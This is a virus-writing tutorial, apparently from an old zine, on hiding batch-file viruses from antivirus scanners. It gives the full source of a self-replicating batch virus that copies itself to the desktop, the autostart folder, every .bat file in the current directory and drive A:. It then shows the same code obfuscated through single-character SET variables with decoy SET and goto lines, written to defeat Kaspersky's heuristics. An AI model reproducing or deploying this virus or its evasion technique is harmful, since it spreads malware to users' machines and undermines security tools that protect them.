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Undetectable batch encrytion by Second Part To Hell

Note: Your anti-virus (e.g. Norton Anti-virus) might detect this article as a virus.
Don't get panic; this article does not contain any malicious code

I try to show you a very good encryption for batch.
I don't know, how any AV-program will detect such a virus. First we need the uncrypted virus code: 

@echo off
copy %0 %windir%\desktop\*.bat
copy %0 %windir%\startm~1\progra~1\auotst~1\WSt.bat
for %%v in (*.bat) do copy %0 %%v
copy %0 A:\

It's a totaly silly virus, and KAV detect it whit heuristic.
The virus copies itself to the desktop, to the german autostart
and to all *.bat files in the current direction. Now try to crypt the code:

set aa=e
set ab=c
set ac=h
set ad=o
set ae=f
set af=t
set ag=y
set ah=n
set ai=u
set aj=l
set ak=p
set al=s
set am=%0
set an=\
set ao=d
set ap=k
set aq=a
set ar=r
set at=m
set au=g
set av=i
@%aa%%ab%%ac%%ad% %ad%%af%%af%
%ab%%ad%%ak%%ag% %am% %windir%%an%%ao%%aa%%al%%ap%%af%%ad%%ap%%an%*.bat
%ab%%ad%%ak%%ag% %am% %windir%%an%%al%%at%%aq%%ar%%af%%at%~1%an%%ak%%ar%%ad%%au%%ar%%aq%~1%an%WST.bat
%ae%%ad%%ar% %%v %av%%ah% (*.bat) %ao%%ad% %ab%%ad%%ak%%ag% %am% %%v
%ab%%ad%%ak%%ag% %am% A:%an%

OK, I think, you wouldn't know, what the code does.
But, KAV is able to include every SET-OP to the lines. What is to do???
You have to write a "fake set op", so KAV don't know, what to include


set aa=fg
set aa=e         ; this is the true set
goto aa
set aa=gf
set ab=gfd
set ab=c         ; this is the true set
goto ab
set ab=gf
set ac=we
set ac=h         ; this is the true set
goto ac
set ac=gf
set ad=ds
set ad=o         ; this is the true set
goto ad
set ad=gf
set ae=j
set ae=f         ; this is the true set
goto ae
set ae=gf
set af=h
set af=t         ; this is the true set
goto af
set af=gf
set ag=g
set ag=y         ; this is the true set
goto ag
set ag=gf
set ah=f
set ah=n         ; this is the true set
goto ah
set ah=gf
set ai=ds
set ai=u         ; this is the true set
goto ai
set ai=gf
set aj=ds
set aj=l         ; this is the true set
goto aj
set aj=gf
set ak=c
set ak=p         ; this is the true set
goto ak
set ak=gf
set al=v
set al=s         ; this is the true set
goto al
set al=gf
set am=b
set am=%0         ; this is the true set
goto am
set am=gf
set an=n
set an=\         ; this is the true set
goto am
set am=gf
set ao=dr
set ao=d         ; this is the true set
goto ao
set ao=gf
set ap=g
set ap=k         ; this is the true set
goto ap
set ap=gf
set aq=e
set aq=a         ; this is the true set
goto aq
set aq=gf
set ar=s
set ar=r         ; this is the true set
goto ar
set ar=gf
set at=h
set at=m         ; this is the true set
goto at
set at=gf
set au=s
set au=g         ; this is the true set
goto au
set au=gf
set av=f
set av=i         ; this is the true set
goto av
set av=gf
@%aa%%ab%%ac%%ad% %ad%%af%%af%
%ab%%ad%%ak%%ag% %am% %windir%%an%%ao%%aa%%al%%ap%%af%%ad%%ap%%an%*.bat
%ab%%ad%%ak%%ag% %am% %windir%%an%%al%%at%%aq%%ar%%af%%at%~1%an%%ak%%ar%%ad%%au%%ar%%aq%~1%an%WST.bat
%ae%%ad%%ar% %%v %av%%ah% (*.bat) %ao%%ad% %ab%%ad%%ak%%ag% %am% %%v
%ab%%ad%%ak%%ag% %am% A:%an%

Perhabs you'll ask, what's that? Infront of every set-op, I wrote an other false set op.
And after every set-op, I wrote a goto and a mark, and even a false set-op!
So include a set isn't possible. I >think< the only way to detect such a virus is EMULATON.
But nowadays, no AV program has emulation :-)
If you have questions or suggestions, fell free and mail me.